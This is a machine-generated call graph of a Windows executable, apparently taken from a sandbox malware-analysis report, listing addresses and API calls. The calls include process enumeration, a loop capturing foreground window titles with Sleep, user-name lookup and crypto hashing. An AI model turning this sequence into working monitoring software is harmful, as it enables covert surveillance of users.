API calls 35097->35100 35098 40690c std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 35098->35093 35098->35095 35099->35103 35102 407e5c 35100->35102 35106 4055c0 40 API calls 35102->35106 35105 4026b0 27 API calls 35103->35105 35104 4069f9 35651 413f7d 35104->35651 35108 406b8d 35105->35108 35109 407e72 35106->35109 35110 406760 41 API calls 35108->35110 35115 407ed8 35109->35115 35681 40ef48 6 API calls 35109->35681 35111 406b98 35110->35111 35113 417df6 38 API calls 35111->35113 35116 406ba1 35113->35116 35114 407e9c 35114->35115 35682 40f25b 28 API calls 35114->35682 35117 4026b0 27 API calls 35115->35117 35118 4055c0 40 API calls 35116->35118 35120 407f4b 35117->35120 35121 406bb7 35118->35121 35123 407f64 35120->35123 35684 402980 27 API calls 4 library calls 35120->35684 35124 40c770 27 API calls 35121->35124 35122 407ecb 35683 40eefe EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 35122->35683 35128 40c990 27 API calls 35123->35128 35127 406bcd 35124->35127 35129 40c990 27 API calls 35127->35129 35130 40800e 35128->35130 35131 406be8 35129->35131 35132 402490 25 API calls 35130->35132 35133 402490 25 API calls 35131->35133 35145 40801d std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 35132->35145 35137 406bf7 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 35133->35137 35134 406c80 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 35138 40bb90 69 API calls 35134->35138 35135 408cea 35141 413527 25 API calls 35135->35141 35136 408ce5 35140 413527 25 API calls 35136->35140 35137->35134 35137->35136 35142 406ca1 35138->35142 35139 40bb90 69 API calls 35143 408120 35139->35143 35140->35135 35144 408cef 35141->35144 35146 40bb90 69 API calls 35142->35146 35147 40bb90 69 API calls 35143->35147 35148 413527 25 API calls 35144->35148 35145->35135 35145->35139 35149 406cb6 35146->35149 35150 408135 35147->35150 35151 408cf4 35148->35151 35152 406800 261 API calls 35149->35152 35154 406800 261 API calls 35150->35154 35158 405f40 47 API calls 35151->35158 35153 406cbf 35152->35153 35155 406cca 35153->35155 35156 406f0f 35153->35156 35157 40813e 35154->35157 35159 40c770 27 API calls 35155->35159 35172 406f71 35156->35172 35666 40ef48 6 API calls 35156->35666 35162 40c770 27 API calls 35157->35162 35232 40818e std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 35157->35232 35160 408d3a 35158->35160 35161 406cdc 35159->35161 35164 408d44 35160->35164 35165 408d6a 35160->35165 35167 40c990 27 API calls 35161->35167 35168 40815b 35162->35168 35164->35165 35175 417df6 38 API calls 35164->35175 35166 401960 27 API calls 35165->35166 35171 408d7d 35166->35171 35173 406cf7 35167->35173 35174 40c990 27 API calls 35168->35174 35169 406f35 35169->35172 35667 40f25b 28 API calls 35169->35667 35176 409340 39 API calls 35171->35176 35177 4026b0 27 API calls 35172->35177 35178 406d0f std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 35173->35178 35665 402980 27 API calls 4 library calls 35173->35665 35179 408176 35174->35179 35181 408d55 Sleep 35175->35181 35184 408d86 35176->35184 35185 406fea 35177->35185 35178->35135 35271 406f0a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 35178->35271 35179->35232 35685 402980 27 API calls 4 library calls 35179->35685 35183 405f40 47 API calls 35181->35183 35183->35164 35194 402510 27 API calls 35184->35194 35189 407003 35185->35189 35669 402980 27 API calls 4 library calls 35185->35669 35187 4026b0 27 API calls 35187->35232 35188 406f64 35668 40eefe EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 35188->35668 35195 40c990 27 API calls 35189->35195 35196 408d99 35194->35196 35197 4070ad 35195->35197 35198 409290 39 API calls 35196->35198 35199 402490 25 API calls 35197->35199 35201 408da4 35198->35201 35207 4070bc std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 35199->35207 35200 402490 25 API calls 35200->35232 35204 402510 27 API calls 35201->35204 35202 40ebbf __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 35203 408cde 35202->35203 35203->34616 35205 408db7 35204->35205 35208 4091e0 39 API calls 35205->35208 35206 40bb90 69 API calls 35209 4071bf 35206->35209 35207->35144 35207->35206 35211 408dc2 35208->35211 35212 40bb90 69 API calls 35209->35212 35210 40bb90 69 API calls 35210->35232 35215 402510 27 API calls 35211->35215 35213 4071d4 35212->35213 35214 406800 261 API calls 35213->35214 35216 4071dd 35214->35216 35218 408dd5 35215->35218 35219 4073d8 35216->35219 35220 4071e8 35216->35220 35217 406800 261 API calls 35217->35232 35221 40c930 27 API calls 35218->35221 35234 407473 35219->35234 35671 40ef48 6 API calls 35219->35671 35222 40c770 27 API calls 35220->35222 35224 408dea 35221->35224 35225 4071fa 35222->35225 35223 408878 35239 4088dd 35223->35239 35689 40ef48 6 API calls 35223->35689 35229 40c990 27 API calls 35224->35229 35230 40c990 27 API calls 35225->35230 35227 40c770 27 API calls 35227->35232 35235 408e02 35229->35235 35236 407215 35230->35236 35231 40741d 35231->35234 35672 40f25b 28 API calls 35231->35672 35232->35135 35232->35178 35232->35187 35232->35200 35232->35210 35232->35217 35232->35223 35232->35227 35237 40c990 27 API calls 35232->35237 35249 402980 27 API calls 35232->35249 35686 40ef48 6 API calls 35232->35686 35687 40f25b 28 API calls 35232->35687 35688 40eefe EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 35232->35688 35233 4088a3 35233->35239 35690 40f25b 28 API calls 35233->35690 35238 4026b0 27 API calls 35234->35238 35240 40ca40 27 API calls 35235->35240 35236->35178 35670 402980 27 API calls 4 library calls 35236->35670 35237->35232 35244 4074da 35238->35244 35245 4026b0 27 API calls 35239->35245 35246 408e17 35240->35246 35251 4074f3 35244->35251 35674 402980 27 API calls 4 library calls 35244->35674 35252 40896a 35245->35252 35253 40ca40 27 API calls 35246->35253 35247 407466 35673 40eefe EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 35247->35673 35249->35232 35250 4088d0 35691 40eefe EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 35250->35691 35258 40c990 27 API calls 35251->35258 35256 408983 35252->35256 35692 402980 27 API calls 4 library calls 35252->35692 35257 408e2c 35253->35257 35263 40c990 27 API calls 35256->35263 35260 40c990 27 API calls 35257->35260 35262 40759d 35258->35262 35261 408e42 35260->35261 35264 402440 25 API calls 35261->35264 35265 402490 25 API calls 35262->35265 35266 408a2d 35263->35266 35267 408e50 35264->35267 35275 4075ac std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 35265->35275 35268 402490 25 API calls 35266->35268 35269 402440 25 API calls 35267->35269 35278 408a3c std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 35268->35278 35270 408e5b 35269->35270 35272 402440 25 API calls 35270->35272 35271->35202 35274 408e66 35272->35274 35273 40bb90 69 API calls 35276 4076af 35273->35276 35277 402440 25 API calls 35274->35277 35275->35135 35275->35273 35280 40bb90 69 API calls 35276->35280 35281 408e71 35277->35281 35278->35135 35279 40bb90 69 API calls 35278->35279 35282 408b3f 35279->35282 35283 4076c4 35280->35283 35284 402440 25 API calls 35281->35284 35285 40bb90 69 API calls 35282->35285 35286 406800 261 API calls 35283->35286 35287 408e7c 35284->35287 35288 408b54 35285->35288 35289 4076cd 35286->35289 35290 402440 25 API calls 35287->35290 35291 406800 261 API calls 35288->35291 35292 4076d8 35289->35292 35296 4078c8 35289->35296 35293 408e87 35290->35293 35294 408b5d 35291->35294 35295 40c770 27 API calls 35292->35295 35297 402440 25 API calls 35293->35297 35298 408c94 35294->35298 35299 408b68 35294->35299 35300 4076ea 35295->35300 35311 40792d 35296->35311 35676 40ef48 6 API calls 35296->35676 35341 408e96 35297->35341 35301 402440 25 API calls 35298->35301 35303 40c770 27 API calls 35299->35303 35304 40c990 27 API calls 35300->35304 35305 408c9f 35301->35305 35307 408b7a 35303->35307 35308 407705 35304->35308 35309 402440 25 API calls 35305->35309 35358 407e39 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 35305->35358 35306 4078f3 35306->35311 35677 40f25b 28 API calls 35306->35677 35310 40c990 27 API calls 35307->35310 35308->35178 35675 402980 27 API calls 4 library calls 35308->35675 35309->35358 35314 408b95 35310->35314 35315 4026b0 27 API calls 35311->35315 35312 402510 27 API calls 35316 408c92 35312->35316 35329 408bad 35314->35329 35693 402980 27 API calls 4 library calls 35314->35693 35319 4079ba 35315->35319 35320 402440 25 API calls 35316->35320 35317 407920 35678 40eefe EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 35317->35678 35322 4079d3 35319->35322 35679 402980 27 API calls 4 library calls 35319->35679 35320->35271 35328 40c990 27 API calls 35322->35328 35324 408eef 35327 408c4c std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 35332 402440 25 API calls 35327->35332 35330 407a7d 35328->35330 35329->35135 35329->35327 35333 402490 25 API calls 35330->35333 35335 408c7c 35332->35335 35345 407a8c std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 35333->35345 35337 402440 25 API calls 35335->35337 35336 402510 27 API calls 35336->35341 35338 408c87 35337->35338 35339 402440 25 API calls 35338->35339 35339->35316 35340 408f2b 35341->35324 35341->35336 35341->35340 35345->35135 35358->35312 35387 405fa1 35386->35387 35390 405fe5 35386->35390 35999 40ef48 6 API calls 35387->35999 35389 405fab 35389->35390 36000 40f25b 28 API calls 35389->36000 35392 4026b0 27 API calls 35390->35392 35394 406066 35392->35394 35393 405fd8 36001 40eefe EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 35393->36001 35988 405350 CreateToolhelp32Snapshot Process32First 35394->35988 35399 40ebbf __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 35401 4065c8 35399->35401 35400 4060a1 35402 4060db 35400->35402 36003 40f25b 28 API calls 35400->36003 35401->34627 35401->34628 35404 4026b0 27 API calls 35402->35404 35406 406156 35404->35406 35405 4060ce 36004 40eefe EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 35405->36004 35407 405350 29 API calls 35406->35407 35409 40615b 35407->35409 35412 4061da 35409->35412 35436 406597 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 35409->35436 36005 40ef48 6 API calls 35409->36005 35411 40619a 35411->35412 36006 40f25b 28 API calls 35411->36006 35412->35412 35413 4026b0 27 API calls 35412->35413 35415 406266 35413->35415 35417 405350 29 API calls 35415->35417 35416 4061cd 36007 40eefe EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 35416->36007 35419 40626b 35417->35419 35420 406276 GetForegroundWindow 35419->35420 35419->35436 35421 406284 GetWindowTextA 35420->35421 35420->35436 35422 4062cd 35421->35422 35425 406328 35421->35425 36008 40ef48 6 API calls 35422->36008 35424 4062d7 35424->35425 36009 40f25b 28 API calls 35424->36009 35426 4026b0 27 API calls 35425->35426 35430 40638a 35426->35430 35428 40631b 36010 40eefe EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 35428->36010 35433 40643c 35430->35433 35434 4064ce std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 35430->35434 36011 40ef48 6 API calls 35430->36011 35432 4063fc 35432->35433 36012 40f25b 28 API calls 35432->36012 35435 4026b0 27 API calls 35433->35435 35434->35436 35438 4065cc 35434->35438 35435->35434 35436->35399 35439 413527 25 API calls 35438->35439 35441 4065d1 35439->35441 35440 40642f 36013 40eefe EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 35440->36013 35444 401973 __fread_nolock 35443->35444 35445 40ee0d 27 API calls 35444->35445 35446 40198a __fread_nolock 35445->35446 35446->34634 35448 40937a 35447->35448 35449 4093b9 35447->35449 36014 40ef48 6 API calls 35448->36014 35451 40ebbf __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 35449->35451 35453 4093cb 35451->35453 35452 409384 35452->35449 36015 40f25b 28 API calls 35452->36015 35453->34646 35455 4093af 36016 40eefe EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 35455->36016 35458 4092d3 35457->35458 35459 409322 35457->35459 36017 40ef48 6 API calls 35458->36017 35460 40ebbf __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 35459->35460 35462 409335 35460->35462 35462->34664 35463 4092dd 35463->35459 36018 40f25b 28 API calls 35463->36018 35465 409318 36019 40eefe EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 35465->36019 35468 409220 35467->35468 35476 409277 35467->35476 36020 40ef48 6 API calls 35468->36020 35469 40ebbf __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 35472 409289 35469->35472 35471 40922a 35471->35476 36021 40f25b 28 API calls 35471->36021 35472->34673 35474 40926d 36022 40eefe EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 35474->36022 35476->35469 35478 40c942 35477->35478 36023 40d660 35478->36023 35480 408dea 35480->34692 36029 40d480 35481->36029 35483 408e17 35483->34715 35485 40943d 35484->35485 35486 4093fb 35484->35486 35488 40ebbf __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 35485->35488 36048 40ef48 6 API calls 35486->36048 35490 40944f 35488->35490 35489 409405 35489->35485 36049 40f25b 28 API calls 35489->36049 35490->34829 35492 409433 36050 40eefe EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 35492->36050 35495 409495 35494->35495 35503 4094e5 35494->35503 36051 40ef48 6 API calls 35495->36051 35497 40ebbf __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 35498 4094f8 35497->35498 35498->34843 35499 40949f 35499->35503 36052 40f25b 28 API calls 35499->36052 35503->35497 35505 4038ba GetLastError CryptReleaseContext 35504->35505 35506 4037fe CryptCreateHash 35504->35506 35507 403a04 35505->35507 35506->35505 35508 403822 35506->35508 35510 403a2a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 35507->35510 35511 403a52 35507->35511 35512 40ee0d 27 API calls 35508->35512 35509 40ebbf __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 35510->35509 36105 402f20 35530->36105 36194 10006436 GetSystemTimeAsFileTime 35539->36194 35541 10002479 35589->34825 35590->34632 35591->34650 35592->34635 35593->34651 35594->34825 35595->34694 35596->34709 35597->34697 35598->34713 35599->34825 35600->34768 35601->34779 35602->34773 35603->34784 35604->34825 35605->34577 35606->34585 35607->34578 35608->34586 35609->34695 35610->34695 35611->34695 35612->34695 35613->34696 35614->34712 35615->34701 35616->34718 35617->34791 35620 40b9eb 35618->35620 35631 40bad4 _Yarn std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 35618->35631 35619 40bb61 35633 401950 27 API calls 35619->35633 35620->35619 35624 40ba81 35620->35624 35625 40ba5a 35620->35625 35630 40ba6b _Yarn 35620->35630 35620->35631 35622 40bb66 35634 4018b0 27 API calls 2 library calls 35622->35634 35627 40edcf std::_Facet_Register 27 API calls 35624->35627 35624->35630 35625->35622 35628 40edcf std::_Facet_Register 27 API calls 35625->35628 35626 40bb6b 35627->35630 35628->35630 35629 413527 25 API calls 35629->35619 35630->35629 35630->35631 35631->35046 35632->35046 35634->35626 35636->35057 35637->35067 35694 413c9b 35638->35694 35642 418633 35641->35642 35643 418616 35641->35643 35642->35104 35643->35642 35644 418623 35643->35644 35645 418637 35643->35645 35757 4135f1 14 API calls _free 35644->35757 35749 4183e9 35645->35749 35648 418628 35758 413517 25 API calls ___std_exception_copy 35648->35758 35652 413f89 CallCatchBlock 35651->35652 35653 413f93 35652->35653 35654 413fa8 35652->35654 35913 4135f1 14 API calls _free 35653->35913 35660 413fa3 35654->35660 35896 413ede EnterCriticalSection 35654->35896 35657 413f98 35914 413517 25 API calls ___std_exception_copy 35657->35914 35658 413fc5 35897 413f06 35658->35897 35660->35082 35662 413fd0 35915 413ff7 LeaveCriticalSection __fread_nolock 35662->35915 35664->35086 35665->35178 35666->35169 35667->35188 35668->35172 35669->35189 35670->35178 35671->35231 35672->35247 35673->35234 35674->35251 35675->35178 35676->35306 35677->35317 35678->35311 35679->35322 35681->35114 35682->35122 35683->35115 35684->35123 35685->35232 35686->35232 35687->35232 35688->35232 35689->35233 35690->35250 35691->35239 35692->35256 35693->35329 35697 413ca7 CallCatchBlock 35694->35697 35695 413cae 35719 4135f1 14 API calls _free 35695->35719 35697->35695 35699 413cce 35697->35699 35698 413cb3 35720 413517 25 API calls ___std_exception_copy 35698->35720 35700 413ce0 35699->35700 35701 413cd3 35699->35701 35711 41dd29 35700->35711 35721 4135f1 14 API calls _free 35701->35721 35705 413cbe 35705->35098 35707 413cf0 35722 4135f1 14 API calls _free 35707->35722 35708 413cfd 35723 413d3b LeaveCriticalSection __fread_nolock 35708->35723 35712 41dd35 CallCatchBlock 35711->35712 35724 418bb1 EnterCriticalSection 35712->35724 35714 41dd43 35725 41ddcd 35714->35725 35719->35698 35720->35705 35721->35705 35722->35705 35723->35705 35724->35714 35726 41ddf0 35725->35726 35727 41de48 35726->35727 35734 41dd50 35726->35734 35742 413ede EnterCriticalSection 35726->35742 35743 413ef2 LeaveCriticalSection 35726->35743 35744 41e25b 14 API calls 2 library calls 35727->35744 35729 41de51 35745 41e2b8 14 API calls _free 35729->35745 35732 41de5a 35732->35734 35746 41e89c 6 API calls std::_Locinfo::_Locinfo_dtor 35732->35746 35739 41dd89 35734->35739 35735 41de79 35747 413ede EnterCriticalSection 35735->35747 35738 41de8c 35738->35734 35748 418bf9 LeaveCriticalSection 35739->35748 35741 413ce9 35741->35707 35741->35708 35742->35726 35743->35726 35744->35729 35745->35732 35746->35735 35747->35738 35748->35741 35750 4183f5 CallCatchBlock 35749->35750 35759 413ede EnterCriticalSection 35750->35759 35752 418403 35760 418444 35752->35760 35756 418421 35756->35104 35757->35648 35758->35642 35759->35752 35768 41fb93 35760->35768 35766 418410 35767 418438 LeaveCriticalSection __fread_nolock 35766->35767 35767->35756 35787 41fb58 35768->35787 35770 418458 35775 418487 35770->35775 35771 41fba4 35771->35770 35772 41ed2f __fread_nolock 15 API calls 35771->35772 35773 41fbfe 35772->35773 35793 41e2b8 14 API calls _free 35773->35793 35777 418499 35775->35777 35782 418473 35775->35782 35776 4184a7 35835 4135f1 14 API calls _free 35776->35835 35777->35776 35781 4184cf _Yarn 35777->35781 35777->35782 35779 4184ac 35836 413517 25 API calls ___std_exception_copy 35779->35836 35781->35782 35784 41d173 __fread_nolock 25 API calls 35781->35784 35810 420f36 35781->35810 35837 418066 35781->35837 35786 41fc3f 63 API calls ___scrt_uninitialize_crt 35782->35786 35784->35781 35786->35766 35789 41fb64 35787->35789 35788 41fb85 35788->35771 35789->35788 35794 41d173 35789->35794 35791 41fb7f 35801 427ed7 35791->35801 35793->35770 35795 41d194 35794->35795 35796 41d17f 35794->35796 35795->35791 35797 4135f1 _free 14 API calls 35796->35797 35798 41d184 35797->35798 35799 413517 ___std_exception_copy 25 API calls 35798->35799 35800 41d18f 35799->35800 35800->35791 35802 427ee4 35801->35802 35803 427ef1 35801->35803 35804 4135f1 _free 14 API calls 35802->35804 35805 427efd 35803->35805 35806 4135f1 _free 14 API calls 35803->35806 35807 427ee9 35804->35807 35805->35788 35808 427f1e 35806->35808 35807->35788 35809 413517 ___std_exception_copy 25 API calls 35808->35809 35809->35807 35811 420f42 CallCatchBlock 35810->35811 35812 420f62 35811->35812 35813 420f4a 35811->35813 35815 420ffd 35812->35815 35819 420f94 35812->35819 35888 4135de 14 API calls _free 35813->35888 35893 4135de 14 API calls _free 35815->35893 35816 420f4f 35889 4135f1 14 API calls _free 35816->35889 35843 425336 EnterCriticalSection 35819->35843 35820 421002 35894 4135f1 14 API calls _free 35820->35894 35823 420f9a 35825 420fb6 35823->35825 35826 420fcb 35823->35826 35824 42100a 35895 413517 25 API calls ___std_exception_copy 35824->35895 35890 4135f1 14 API calls _free 35825->35890 35844 421028 35826->35844 35830 420fbb 35891 4135de 14 API calls _free 35830->35891 35831 420fc6 35892 420ff5 LeaveCriticalSection __wsopen_s 35831->35892 35834 420f57 35834->35781 35835->35779 35836->35782 35838 4180a3 35837->35838 35839 41807e 35837->35839 35838->35781 35839->35838 35840 41d173 __fread_nolock 25 API calls 35839->35840 35841 41809c 35840->35841 35842 420f36 __wsopen_s 63 API calls 35841->35842 35842->35838 35843->35823 35845 42104a 35844->35845 35883 421066 35844->35883 35846 42104e 35845->35846 35849 42109e 35845->35849 35847 4135de __dosmaperr 14 API calls 35846->35847 35848 421053 35847->35848 35851 4135f1 _free 14 API calls 35848->35851 35850 4210b4 35849->35850 35852 41d158 __fread_nolock 27 API calls 35849->35852 35853 420bcf __wsopen_s 39 API calls 35850->35853 35854 42105b 35851->35854 35852->35850 35855 4210bd 35853->35855 35856 413517 ___std_exception_copy 25 API calls 35854->35856 35857 4210c2 35855->35857 35858 4210fb 35855->35858 35856->35883 35861 4210c6 35857->35861 35862 4210e8 35857->35862 35859 421155 WriteFile 35858->35859 35860 42110f 35858->35860 35866 421178 GetLastError 35859->35866 35872 4210de 35859->35872 35863 421117 35860->35863 35864 421145 35860->35864 35865 4211c2 35861->35865 35870 420b67 __wsopen_s 6 API calls 35861->35870 35867 4207bb __wsopen_s 44 API calls 35862->35867 35868 421135 35863->35868 35869 42111c 35863->35869 35871 420c40 __wsopen_s 7 API calls 35864->35871 35876 4135f1 _free 14 API calls 35865->35876 35865->35883 35866->35872 35867->35872 35874 420e04 __wsopen_s 8 API calls 35868->35874 35869->35865 35873 421125 35869->35873 35870->35872 35875 421133 35871->35875 35872->35865 35877 421198 35872->35877 35872->35883 35878 420d1b __wsopen_s 7 API calls 35873->35878 35874->35875 35875->35872 35879 4211e3 35876->35879 35881 4211b6 35877->35881 35882 42119f 35877->35882 35878->35875 35880 4135de __dosmaperr 14 API calls 35879->35880 35880->35883 35885 4135bb __dosmaperr 14 API calls 35881->35885 35884 4135f1 _free 14 API calls 35882->35884 35883->35831 35886 4211a4 35884->35886 35885->35883 35887 4135de __dosmaperr 14 API calls 35886->35887 35887->35883 35888->35816 35889->35834 35890->35830 35891->35831 35892->35834 35893->35820 35894->35824 35895->35834 35896->35658 35898 413f13 35897->35898 35900 413f28 35897->35900 35935 4135f1 14 API calls _free 35898->35935 35902 418066 ___scrt_uninitialize_crt 63 API calls 35900->35902 35905 413f23 35900->35905 35901 413f18 35936 413517 25 API calls ___std_exception_copy 35901->35936 35904 413f3d 35902->35904 35916 41eb3a 35904->35916 35905->35662 35908 41d173 __fread_nolock 25 API calls 35909 413f4b 35908->35909 35920 41ec06 35909->35920 35913->35657 35914->35660 35915->35660 35917 41eb51 35916->35917 35918 413f45 35916->35918 35917->35918 35938 41e2b8 14 API calls _free 35917->35938 35918->35908 35921 41ec17 35920->35921 35922 41ec2c 35920->35922 35950 4135de 14 API calls _free 35921->35950 35924 41ec75 35922->35924 35928 41ec53 35922->35928 35952 4135de 14 API calls _free 35924->35952 35925 41ec1c 35951 4135f1 14 API calls _free 35925->35951 35939 41eb7a 35928->35939 35929 41ec7a 35953 4135f1 14 API calls _free 35929->35953 35932 413f51 35932->35905 35937 41e2b8 14 API calls _free 35932->35937 35933 41ec82 35954 413517 25 API calls ___std_exception_copy 35933->35954 35935->35901 35936->35905 35937->35905 35938->35918 35940 41eb86 CallCatchBlock 35939->35940 35955 425336 EnterCriticalSection 35940->35955 35942 41eb94 35943 41ebc6 35942->35943 35944 41ebbb 35942->35944 35971 4135f1 14 API calls _free 35943->35971 35956 41ec93 35944->35956 35947 41ebc1 35972 41ebfa LeaveCriticalSection __wsopen_s 35947->35972 35949 41ebe3 35949->35932 35950->35925 35951->35932 35952->35929 35953->35933 35954->35932 35955->35942 35973 4255b2 35956->35973 35958 41eca9 35986 425521 15 API calls 3 library calls 35958->35986 35960 41eca3 35960->35958 35961 41ecdb 35960->35961 35964 4255b2 __wsopen_s 25 API calls 35960->35964 35961->35958 35962 4255b2 __wsopen_s 25 API calls 35961->35962 35965 41ece7 FindCloseChangeNotification 35962->35965 35963 41ed01 35966 41ed23 35963->35966 35987 4135bb 14 API calls 2 library calls 35963->35987 35967 41ecd2 35964->35967 35965->35958 35968 41ecf3 GetLastError 35965->35968 35966->35947 35970 4255b2 __wsopen_s 25 API calls 35967->35970 35968->35958 35970->35961 35971->35947 35972->35949 35974 4255bf 35973->35974 35975 4255d4 35973->35975 35976 4135de __dosmaperr 14 API calls 35974->35976 35978 4135de __dosmaperr 14 API calls 35975->35978 35980 4255f9 35975->35980 35977 4255c4 35976->35977 35979 4135f1 _free 14 API calls 35977->35979 35981 425604 35978->35981 35982 4255cc 35979->35982 35980->35960 35983 4135f1 _free 14 API calls 35981->35983 35982->35960 35984 42560c 35983->35984 35985 413517 ___std_exception_copy 25 API calls 35984->35985 35985->35982 35986->35963 35987->35966 35989 4053c1 FindCloseChangeNotification 35988->35989 35991 40538e 35988->35991 35990 4053ca 35989->35990 35992 4053f0 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 35990->35992 35995 405413 35990->35995 35991->35990 35994 4053b3 Process32Next 35991->35994 35993 40ebbf __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 35992->35993 35996 40540f 35993->35996 35994->35989 35994->35991 35997 413527 25 API calls 35995->35997 35996->35402 35996->35436 36002 40ef48 6 API calls 35996->36002 35998 405418 35997->35998 35999->35389 36000->35393 36001->35390 36002->35400 36003->35405 36004->35402 36005->35411 36006->35416 36007->35412 36008->35424 36009->35428 36010->35425 36011->35432 36012->35440 36013->35433 36014->35452 36015->35455 36016->35449 36017->35463 36018->35465 36019->35459 36020->35471 36021->35474 36022->35476 36024 40d6e8 36023->36024 36027 40d67a _Yarn 36023->36027 36028 40da70 27 API calls 4 library calls 36024->36028 36026 40d6fa 36026->35480 36027->35480 36028->36026 36030 40d4c3 36029->36030 36031 40d650 36030->36031 36032 40d590 36030->36032 36040 40d4c8 _Yarn 36030->36040 36046 401950 27 API calls 36031->36046 36035 40d5c5 36032->36035 36036 40d5eb 36032->36036 36034 40d655 36047 4018b0 27 API calls 2 library calls 36034->36047 36035->36034 36038 40d5d0 36035->36038 36042 40edcf std::_Facet_Register 27 API calls 36036->36042 36045 40d5dd _Yarn 36036->36045 36041 40edcf std::_Facet_Register 27 API calls 36038->36041 36039 40d5d6 36043 413527 25 API calls 36039->36043 36039->36045 36040->35483 36041->36039 36042->36045 36044 40d65f 36043->36044 36045->35483 36047->36039 36048->35489 36049->35492 36050->35485 36051->35499 36106 402f44 SetLastError 36105->36106 36107 402f6c 36105->36107 36187 402bc0 70 API calls 36106->36187 36109 402f76 36107->36109 36111 402fb1 SetLastError 36107->36111 36118 402fd9 36107->36118 36188 402bc0 70 API calls 36109->36188 36189 402bc0 70 API calls 36111->36189 36118->36109 36122 403044 GetNativeSystemInfo 36118->36122 36122->36109 36195 10006468 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 36194->36195 36195->35541 36468 405722 36467->36468 36471 405764 36467->36471 36516 40ef48 6 API calls 36468->36516 36470 40572c 36470->36471 36517 40f25b 28 API calls 36470->36517 36473 4026b0 27 API calls 36471->36473 36475 4057e1 GetUserNameA 36473->36475 36474 40575a 36518 40eefe EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 36474->36518 36477 405830 36475->36477 36477->36477 36478 4026b0 27 API calls 36477->36478 36479 40584c std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 36478->36479 36480 405e94 36479->36480 36487 405933 36479->36487 36511 405e6a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 36479->36511 36519 40ef48 6 API calls 36479->36519 36482 413527 25 API calls 36480->36482 36481 40ebbf __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 36483 405e8e 36481->36483 36484 405e99 36482->36484 36486 405902 36486->36487 36520 40f25b 28 API calls 36486->36520 36489 4026b0 27 API calls 36487->36489 36491 4059aa GetUserNameA 36489->36491 36490 405929 36521 40eefe EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 36490->36521 36493 4059f0 36491->36493 36493->36493 36494 4026b0 27 API calls 36493->36494 36495 405a0c std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 36494->36495 36495->36480 36498 405b10 36495->36498 36495->36511 36522 40ef48 6 API calls 36495->36522 36497 405ad3 36497->36498 36523 40f25b 28 API calls 36497->36523 36500 4026b0 27 API calls 36498->36500 36502 405baa GetUserNameA 36500->36502 36501 405b06 36524 40eefe EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 36501->36524 36504 405bf0 36502->36504 36504->36504 36505 4026b0 27 API calls 36504->36505 36506 405c0c std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 36505->36506 36506->36480 36507 405c9f GetForegroundWindow GetWindowTextA 36506->36507 36506->36511 36508 405cc1 36507->36508 36508->36508 36509 4026b0 27 API calls 36508->36509 36514 405cdd 36509->36514 36510 405e3e 36510->36480 36510->36511 36511->36481 36513 405ddd Sleep GetForegroundWindow GetWindowTextA 36513->36514 36514->36510 36514->36513 36514->36514 36515 4026b0 27 API calls 36514->36515 36525 418275 42 API calls 36514->36525 36515->36514 36516->36470 36517->36474 36518->36471 36519->36486 36520->36490 36521->36487 36522->36497 36523->36501 36524->36498 36525->36514 36527 405473 36526->36527 